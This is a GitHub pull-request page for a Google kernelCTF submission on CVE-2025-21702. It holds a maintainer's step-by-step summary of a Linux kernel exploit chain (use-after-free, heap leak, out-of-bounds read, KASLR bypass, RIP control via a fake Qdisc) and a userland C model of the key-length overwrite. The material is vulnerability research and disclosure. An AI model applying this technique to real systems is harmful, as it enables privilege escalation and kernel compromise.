Add kernelCTF CVE-2025-21702_lts_cos #187

Merged
koczkatamas merged 8 commits into google:master from quanggle97:master
Sep 27, 2025

Conversation

@quanggle97
Contributor

No description provided.

@koczkatamas koczkatamas added the kCTF: vuln OK The submission exploits the claims vulnerability (passed manual verification) label Jun 3, 2025
@koczkatamas
Collaborator

Hey!

FYI this is my summary of the writeup. Let me know if there is any incorrect information in this:

  1. Refcounting issue on hfsc_class ("class_A") causing the object to be freed and leaving a dangling pointer.
  2. Convert it to a heap address leak primitive:
    • Spray user_key_payload in the memory of hfsc_class, create another heap object (also hfsc_class, "class_B") which will be inserted into a red-black tree structure (hfsc_class->el_node), which will leak class_B->el_node into user_key_payload's data which can be read, so we have class_B's address (as it can be easily calculated from class_B->el_node).
  3. Convert it to a heap out-of-bounds read primitive:
    • Leak an address of an hfsc_class from the previous primitive, delete it and spray a fake user_key_payload with rb_node->rb_left pointing to user_key_payload->datalen; with the rb->__rb_parent_color = (unsigned long)p | color primitive we can overwrite the datalen field with a big number (the p kernel pointer), so it becomes an out-of-bounds primitive.
  4. KASLR leak: sprays a lot of xfrm_policy objects and OOB reads, scanning and trying to identify xfrm_policy objects from the leak (via checking properties for having expected values), and it leaks xfrm_policy->timer.function, which is the kernel symbol xfrm_policy_timer.
  5. RIP control: spray a fake Qdisc + ROP chain with user_key_payload (its address is known from the heap address leak) and then replace the victim hfsc_class->Qdisc with the fake sprayed Qdisc object. Trigger Qdisc->enqueue for RIP control.
    • It needs to be triggered twice, as the first time will set qlen to 0 and hfsc_dequeue() will return early; the second time, qlen will be 1 and hfsc_dequeue() will lead to code execution.
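
The datalen overwrite in step 3 of the summary above, modelled in userland as an added example (this is not the PR's exploit code and not a comment from the thread). It reproduces the kernel's rb_node and user_key_payload layouts and the arithmetic of rb_set_parent_color(), and stands in a constructed two-slot "slab" for adjacent kmalloc objects; FAKE_PARENT and NEIGHBOUR_SECRET are constructed values in place of real kernel addresses, and model_user_read() mirrors the bounds logic of the kernel's user_read(). Nothing here talks to the kernel.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* struct rb_node as laid out by include/linux/rbtree_types.h: the node colour
 * lives in bit 0 of the parent pointer, so a parent update is a full 8-byte
 * store of (parent | colour) at offset 0 of whatever rb_left/rb_right points at. */
struct rb_node {
    unsigned long __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
};
#define RB_RED   0UL
#define RB_BLACK 1UL

/* Same arithmetic as the kernel's rb_set_parent_color(); memcpy instead of a
 * plain store only to keep this userland model free of aliasing UB. */
static void rb_set_parent_color(struct rb_node *rb, const void *p, unsigned long color)
{
    unsigned long v = (unsigned long)(uintptr_t)p | color;
    memcpy(&rb->__rb_parent_color, &v, sizeof v);
}

/* struct user_key_payload (security/keys/user_defined.h): rcu_head occupies
 * bytes 0..15, datalen sits at offset 16, data[] starts at offset 24. */
struct user_key_payload {
    void *rcu_next;
    void *rcu_func;
    unsigned short datalen;
    char data[] __attribute__((aligned(8)));
};

/* Model of user_read(): copies min(buflen, datalen) bytes and returns datalen. */
static long model_user_read(const struct user_key_payload *upayload, char *buffer, size_t buflen)
{
    long ret = upayload->datalen;
    if (buffer && buflen > 0) {
        if (buflen > upayload->datalen)
            buflen = upayload->datalen;
        memcpy(buffer, upayload->data, buflen);
    }
    return ret;
}

/* Constructed stand-in for two adjacent slab slots: the victim payload in the
 * first, a neighbour holding something worth leaking in the second. */
#define SLOT_SIZE 64
static unsigned char slab[2 * SLOT_SIZE] __attribute__((aligned(8)));
#define NEIGHBOUR_SECRET 0xffff9a1c0f2b8b40UL   /* constructed; looks like a heap pointer */
#define FAKE_PARENT      0xffff9a1c0f2b8000UL   /* constructed p; only bits 0..15 reach datalen */

static struct user_key_payload *setup_slab(void)
{
    struct user_key_payload *victim = (struct user_key_payload *)slab;
    unsigned long secret = NEIGHBOUR_SECRET;
    memset(slab, 0, sizeof slab);
    victim->datalen = 8;                      /* as if add_key("user", ..., 8 bytes) */
    memcpy(victim->data, "AAAAAAAA", 8);
    memcpy(slab + SLOT_SIZE, &secret, sizeof secret);
    return victim;
}

/* The step from the summary: a fake el_node whose rb_left is aimed at
 * &victim->datalen, so the next rb_set_parent_color() on that "child" lands
 * on datalen. Returns the corrupted datalen (low 16 bits of p | colour). */
static unsigned short corrupt_datalen(struct user_key_payload *victim)
{
    struct rb_node fake_el_node = {0};
    fake_el_node.rb_left = (struct rb_node *)&victim->datalen;
    rb_set_parent_color(fake_el_node.rb_left, (const void *)(uintptr_t)FAKE_PARENT, RB_BLACK);
    return victim->datalen;
}

/* Before corruption the read stops at 8 bytes; after it, a 64-byte read runs
 * off the victim slot and returns the neighbour's first 8 bytes. Returns the
 * value recovered from the neighbour slot, or 0 if the read stayed in bounds. */
static unsigned long leak_neighbour(void)
{
    char buf[SLOT_SIZE];
    unsigned long leaked = 0;
    struct user_key_payload *victim = setup_slab();
    long before = model_user_read(victim, buf, sizeof buf);   /* 8: in bounds */
    unsigned short after = corrupt_datalen(victim);            /* 0x8001 with FAKE_PARENT */
    if (before != 8 || after <= SLOT_SIZE)
        return 0;
    if (model_user_read(victim, buf, sizeof buf) != after)     /* now copies all 64 bytes */
        return 0;
    /* data[] begins at slot offset 24, so the neighbour slot starts at buf + 40 */
    memcpy(&leaked, buf + SLOT_SIZE - offsetof(struct user_key_payload, data), sizeof leaked);
    return leaked;
}

int main(void)
{
    struct user_key_payload *victim = setup_slab();
    printf("datalen after rb_set_parent_color: %#x\n", corrupt_datalen(victim));
    printf("neighbour slot via keyctl_read-style read: %#lx\n", leak_neighbour());
    return 0;
}
```

The parent pointer p is whatever node the rebalancing pairs the fake child with, so only its low 16 bits (plus the colour bit) become the new datalen; the same 8-byte store also clobbers the six padding bytes after datalen but leaves data[] intact, which is why the payload still reads cleanly afterwards and a large keyctl_read() buffer then walks into the adjacent objects.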

@koczkatamas koczkatamas merged commit 463c856 into google:master Sep 27, 2025
14 checks passed
qwerty-theori pushed a commit to qwerty-theori/security-research that referenced this pull request Dec 31, 2025
* Add kernelCTF CVE-2025-21702_lts_cos

* remove unused functions

* removed unused functions

* Update exploit.c

* Update exploit.c

* Update exploit.c

* Update exploit.c

* Update exploit.md to reflect exploit.c modified
@bsauce

bsauce commented Jan 17, 2026

> No description provided.

When testing the exploit, why does keyctl_read() return failure when leaking the address of hfsc_class_B: "keyctl_read(): Permission Denied"? Do we have permission to read the user key created by add_key()?
